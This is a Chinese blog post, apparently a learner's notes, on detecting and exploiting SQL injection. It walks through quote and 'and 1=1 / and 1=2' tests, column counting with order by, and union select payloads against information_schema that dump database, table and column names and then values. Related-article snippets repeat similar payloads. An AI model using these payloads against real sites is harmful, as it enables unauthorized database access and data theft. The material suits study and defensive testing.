SQL注入——判断注入

最新推荐文章于 2024-05-20 14:55:13 发布
最新推荐文章于 2024-05-20 14:55:13 发布
阅读量3.4k 收藏 10
点赞数 2
分类专栏: 网安 文章标签: sql 数据库 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45817336/article/details/114043201
版权

SQL注入漏洞

SQL注入漏洞基本原理

Web应用程序对用户输入的数据校验处理不严或者根本没有校验,致使用户可以拼接执行SQL命令。
可能导致数据泄露或数据破坏,缺乏可审计性,甚至导致完全接管主机。
sql注入是将用户输入的数据当作了SQL语句放入了数据库执行。
XSS是将用户输入的数据当作了HTML语句放到了页面上执行。

部分SQL语句

order by 字段:根据该字段排序,由小到大。
order by 3:根据第三个字段排序,由小到大。
limit 0,2:从第一行起显示两条记录。(0表示第一行,2表示显示两行)
union select:将多个表拼接在一起显示。
column_name:字段名
table_name:表名
schema_name:库名
information_schema:表示所有信息,包括库、表、字段
information_schema.columns:表示所有字段的信息
information_schema.tables:表示所有表的信息
information_schema.schemata:表示所有数据库的信息
table_schema:tables表中的数据库名

注入步骤

1.找:与数据库交互的地方(增删改查)
功能:注册、登录、搜索框、筛选、排序。
读取数据:网站偷偷记录我们的数据,收入数据库。

2.判断:语句是否执行
找注入点:id=1’ 在1后面加单引号,页面出错
id=1 and 1=1 正常 id=1 and 1=2 错误
参数可控:改变网页地址的参数,看页面是否变化。

3.查看前一个表的字段数
用order by 数字,直到某一个数字n报错,说明该表有n-1个字段

4.查询数据库名

and 1=2 union select 1,schema_name from information_schema.schemata limit 0,1

4.查询当前库的表名,用union连接select语句
使union前的语句不成立,以执行我们输入的语句
and 1=2 union select…
从information_schema库的tables表中查询table_name字段,且数据库名等于当前数据库,显示第一行的信息(即第一个表名)

and 1=2 union select 1,table_name from information_schema.tables where table_schema=database() limit 0,1

因为我们查的只有一个字段名table_name,所以要在table_name前添加1,2,3等等来占位,以符合前一个表的字段数。(例如:select 1,table_name from…)
5.查询字段名

select 1,column_name from information_schema.columns where table_schema= database() and table_name=‘上一步查到的表名’ limit 0,1
(单引号要换成英文的)

6.查字段的值

and 1=2 union select 1,字段名 from 表名

帅超超i
关注
  • 2
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
SQL注入笔记
weixin_42695055的博客
12-28 1159
利用现有应用程序,将(恶意)的SQL命令注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入(恶意)SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执行SQL语句。
网络安全——sql注入判断
W981113的博客
01-03 3803
?可以传递参数 sql数值型注入 1.判断注入点 ​ 数值型注入: ?id=1 and 1=1 , ?id=1 and 1=2 ​ 语句:select * from 表名 where id=1 and 1/2 2.猜字段数(二分法) ​ ?id=1 order by x 3.确定显示位 ​ ?id=-1 union select 1,2,3,4 --
网络安全SQL注入--一篇就够
FaceMarkMan的博客
01-09 996
骇客级别的SQL注入
【2024HW】蓝队面试题
最新发布
2401_84466223的博客
05-20 1056
此教程为纯技术分享!本教程的目的决不是为那些怀有不良动机的人提供及技术支持!也不承担因为技术被滥用所产生的连带责任!本教程的目的在于最大限度地唤醒大家对网络安全的重视,并采取相应的安全措施,从而减少由网络安全而带来的经济损失。
漏洞学习--SQL注入
qq_45675619的博客
02-19 5270
漏洞学习--SQL注入
sql注入日记
weixin_66484873的博客
01-27 3521
SQL注入笔记
【干货】如何判断 Sql 注入
未名编程
07-19 1万+
注:本文在Jewel591 文章片段的基础上加以实例说明而成 原文链接 1.判断是否存在 Sql 注入漏洞2.判断 Sql 注入漏洞的类型2.1 数字型判断:2.2 字符型判断:3.实例说明less-1数值型方法判断字符型方法判断less-2 通常情况下,可能存在 Sql 注入漏洞的 Url 是类似这种形式 :http://xxx.xxx.xxx/abcd.php?id=XX对 Sql 注入判断,主要有两个方面: 判断该带参数的 Url 是否存在 Sql 注入? 如果存在 Sql 注入,那么属于
SQL注入注入点的判断
谢公子的博客
07-26 3806
本文是介绍如何判断某一处是否存在SQL注入,话不多说,直接开干。 第一处测试是sql-libs的Less-1,这是一个字符型注入的题目。 后台的SQL语句是 $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1"; 我们设置 id=1 后面的字符为测试点 进行模糊测试 ...
SQL注入——mssql注入
cldimd的博客
03-19 2335
1、Mssql权限问题 Mssql角色: 服务器角色--针对运行整个数据库服务器设定的角色和权限。 数据库角色--针对某个特定数据库设定的角色和权限。 固定服务器角色 sysadmin 可以在 SQL Server 中执行任何活动。 serveradmin ...
pangolinsdl—sql注入工具
06-20
**SQL注入工具——PangolinsDL详解** SQL注入是一种常见的网络安全漏洞,它允许攻击者通过输入恶意的SQL代码来操纵或获取数据库中的敏感信息。针对这种威胁,开发者和安全研究人员常常使用SQL注入工具来进行测试和...
sql注入初学——松风1
08-03
SQL注入是一种常见的网络安全威胁,它发生在应用程序未能正确过滤或验证用户输入的情况下,允许攻击者向SQL查询中插入恶意代码。本文将深入探讨SQL注入的基本概念、检测方法以及针对不同数据库类型的识别技术。 ...
啊D——SQL注入工具
12-01
啊D注入工具
SQL注入漏洞全接触——高级篇.txt
02-13
看完入门篇和进阶篇后,稍加练习,破解...5. 猜解Access时只能用Ascii逐字解码法,SQLServer也可以用这种方法,只需要两者之间的区别即可,但是如果能用SQLServer的报错信息把值暴露出来,那效率和准确率会有极大的提高
如何快乐地检测SQL注入
m0_60571990的博客
03-04 517
如何快乐地检测SQL注入
sql注入猜测字段数的基本方法
bcbobo21cn的专栏
02-16 529
sql order by 可以根据列名,或数字指定第几个字段排序;
sql注入点的判断
热门推荐
sinat_41380394的博客
08-21 1万+
判断sql注入点 1.单引号判断     http://www.xxx.com/xxx.asp?id=10' 如果出现错误提示,则该网站可能就存在注入漏洞。 2.and判断     http://www.xxx.com/xxx.asp?id=10'and 1=1这个条件永远都是真的,所以当然返回是正常页     http://www.xxx.com/xxx.asp?id=10'and 1=2如...
渗透测试之sql注入验证安全与攻击性能
zz12345600354的博客
05-18 711
由于渗透测试牵涉到安全性以及攻击性,为了便于交流分享,本人这里不进行具体网址的透露了。我们可以在网上查找一些公司官方网站如(http://www.XXXXXX.com/xxxx?id=1)
HW自学:蓝队初级到中级
MachineGunJoe666
07-11 1312
根据请求包和响应包进行对比判断,看下请求包内是否有系统命令,比如看下请求包内是否有ipconfig,然后看下响应包回显是否有ip相关的内容,如果有的话说明攻击成功,如果没有,说明攻击未成功,但是确实也还是恶意攻击。3、有时候我们可以判断出发动攻击的团伙是哪个,然后更全面的了解该攻击同伙惯用的攻击手法,这也有利于溯源的进行或者进而部署更全面的安全防护方案,这就是攻击团伙调查。如果能做漏洞验证的话,我会进行复现验证下。1)可疑程序执行,可以对可执行的程序或命令进行鉴别,如果不符合预期,则可能已经被入侵。
怎么判断sql注入是否成功
05-26
判断 SQL 注入是否成功,可以通过以下几个步骤: 1. 输入一段恶意 SQL 代码,例如在输入框中输入:1' or '1'='1,然后点击提交按钮。 2. 如果页面返回的结果与预期不符合,例如返回了所有的数据而非特定的数据,那么说明 SQL 注入成功。 3. 如果可以执行其他恶意操作,例如删除数据库中的数据或者获取敏感信息,那么说明 SQL 注入成功。 4. 可以通过查看数据库日志或者应用程序日志,来确认是否发生了 SQL 注入攻击。 需要注意的是,为了防止 SQL 注入攻击的发生,应该对输入的数据进行严格的过滤和验证,避免恶意代码的注入
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

帅超超i

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值